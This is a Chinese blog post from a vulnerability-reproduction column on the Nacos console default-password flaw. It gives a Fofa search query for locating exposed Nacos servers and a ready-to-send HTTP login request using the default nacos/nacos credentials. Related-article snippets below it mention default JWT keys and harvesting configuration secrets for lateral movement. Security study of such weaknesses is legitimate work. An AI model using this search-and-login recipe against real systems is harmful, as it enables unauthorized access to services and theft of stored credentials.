【漏洞复现】Nacos 控制台默认口令漏洞

最新推荐文章于 2024-06-27 18:42:32 发布
最新推荐文章于 2024-06-27 18:42:32 发布
阅读量455 收藏
点赞数 5
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138268457
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

漏洞描述:

Nacos控制台默认口令漏洞是一个重要的安全问题,它涉及到未经授权的访问风险。在Nacos的某些版本中,如果使用了默认的口令或密钥,攻击者可能会利用这些默认设置来绕过身份认证,直接获得对Nacos的访问权限。

搜索语法:

Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"

漏洞详情:

1.Nacos服务系统。

2.漏洞POC:

POST /nacos/v1/auth/users/login HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Host: {{Hostname}}
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 29
Connection: close

username=nacos&password=nacos

3.漏洞复现结果。

晚风不及你ღ
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

Alibaba Nacos存在默认口令漏洞
nnn2188185的博客
03-18 2151
Nacos是阿里巴巴最新开源的项目。 Alibaba Nacos存在弱口令漏洞。攻击者利用默认弱密码登录系统后台,获取敏感信息。
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。 Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。 服务(Service)是 Nacos 世界的一等公民。Nacos 支持几乎所有主流类型的“服务”的发现、配置和管理: Kubernetes Service gRPC & Dubbo RPC Service Spring Cloud RESTful Service Nacos 的关键特性包括: 服务发现和服务健康监测 Nacos 支持基于 DNS 和基于 RPC 的服务发现。服务提供者使用 原生SDK、OpenAPI、或一个独立的Agent TODO注册 Service
(20240205)网络安全检查常见漏洞及修复建议
weixin_44787474的博客
02-05 890
网络安全检查常见漏洞及修复建议,保证业务系统及数据安全
上心师傅的思路分享(三)--Nacos渗透
weixin_72543266的博客
06-10 1487
Nacos 是阿里巴巴推出来的一个开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。但是Nacos是部署在内网的,因此下面通过语法搜索出来的可以看到的,一般会做访问限制的,正常是访问不到的,如果可以访问就可以尝试是否存在漏洞了.当然如果直接在真实环境下测试,一是未授权行为,二是不容易找到复现环境,所以在本地搭建环境来进行复现是最安全,也是最容易。
SexyBeast233#SecBooks#Alibaba Nacos 控制台默认口令1
07-25
Alibaba Nacos 控制台默认口令漏洞描述Alibaba Nacos 控制台存在默认口令 nacos/nacos,可登录后台查看敏感信息漏洞影响漏洞
漏洞实战(1):NACOS默认密钥漏洞QVD-2023-6271
OneMoreThink
03-09 3559
原理危害攻击资产发现漏洞利用防御1、原理NACOS[1],/nɑ:kəʊs/,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。在<=2.2.0、<=1.4.4的版本中,NACOS的配置文件conf/application.properties存在默认密钥nacos.core.auth.plugin.nacos.token.secret.key=SecretKey01...
Nacos漏洞总结复现
渗透测试研究中心
03-23 1万+
Nacos漏洞总结复现一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户0x01漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa:app="NACOS"0x03 ...
Nacos默认用户名和密码
域名转让:chinabeaut.com、unienv.com
11-29 3万+
nacos/nacos
NACOS漏洞深入解析(审计+复现
qq_49849300的博客
03-27 4891
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
edusrc系列(二):Nacos从弱口令到任意用户信息修改
weixin_67488888的博客
09-13 957
Nacos 是阿里巴巴推出来的一个新开源项目,这是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。但就是这样一个为我们带来方便的系统,也避免不了存在安全问题。xxx学院某域名下搭建了该系统,并且存在相关安全问题。弱口令为:nacos/nacos。http://media.xxx.edu.cn:8888/nacos 是会跳转的。方式提交,增加相应请求体字段,成功添加用户。
渗透测试--Nacos系统
qq_53003652的博客
11-25 2607
nacos是指,阿里为 SpringCloud 贡献了一个子项目,叫做 SpringCloud Alibaba,其中包括了微服务开发中的几个基础组件,Nacos 就是此项目中的一项技术。可以实现服务注册中心、分布式配置中心。针对微服务架构中的服务发现、配置管理、服务治理的综合型解决方案。Nacos在攻防实战中也是经常遇到,大多数布置是在内网,但是公网上也是有不少的,因为其存在多个漏洞,师傅们也是通过nacos拿下了不少分数。
Nacos全面解析
qq_45443475的博客
08-29 1万+
Nacos全面解析
Nacos未授权访问漏洞
00勇士王子的博客
02-27 6309
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Alibaba Nacos JWT令牌使用默认密钥浅析
lwwzyy
03-18 5784
Nacos服务管理平台因默认密钥导致的认证绕过漏洞。在默认配置为未修改的情况下,攻击者可以构造用户 token 进入后台,导致系统被攻击与控制。许多Nacos 用户只开启了鉴权,但没有修改默认密钥,导致Nacos系统仍存在被入侵的风险。
nacos漏洞汇总
最新发布
潇逗
06-27 1440
Alibaba Nacos是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。指纹:app=“nacos默认密码nacos nacos
SpringCloud快速学习(7)——nacos
qq_50665031的博客
07-21 6598
Nacos致力于发现、配置和管理微服务。Nacos提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos帮助您更敏捷和容易地构建、交付和管理微服务平台。Nacos是构建以“服务”为中心的现代应用架构(例如微服务范式、云原生范式)的服务基础设施。...
nacos —— 控制台默认用户名密码
热门推荐
贱男
02-04 5万+
一、引言 最近疫情比较严重,小伙伴就老老实实呆在家办公吧~~ 新的一年小编近几个月比较忙,所以博客更新的比较慢,但是工作还是得继续呀。 新年的第一篇博客,新年快乐、新年快乐、新年快乐。 二、默认密码 新的一年第一个礼拜小编在家办公,接触了一个新的项目,其中所使用的注册中心是阿里巴巴开源的Nacos。 把Nacos服务启动之后,服务也相对注册上了,访问Nacos的后台直接弹出个登陆页面 ...
Nacos 控制台如何进入
05-31
进入 Nacos 控制台的步骤如下: 1. 首先确保你已经启动了 Nacos 服务。 2. 在浏览器中输入 `http://<Nacos IP 地址>:<Nacos 端口号>/nacos`,然后按下回车键。 例如,如果你的 Nacos IP 地址是 `127.0.0.1`,端口号是 `8848`,那么你可以在浏览器中输入 `http://127.0.0.1:8848/nacos`。 3. 输入 Nacos 控制台的用户名和密码,然后点击登录按钮即可。 默认情况下,Nacos 控制台的用户名是 `nacos`,密码是 `nacos`。你可以在 Nacos 的配置文件中进行修改。 4. 登录成功后,你就可以在 Nacos 控制台中对服务进行管理和配置了。 需要注意的是,如果你在 Docker 中启动了 Nacos 服务,那么你需要将 Nacos 容器的端口映射到主机上,才能在浏览器中访问 Nacos 控制台。具体的端口映射命令可以参考 Docker 的相关文档。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值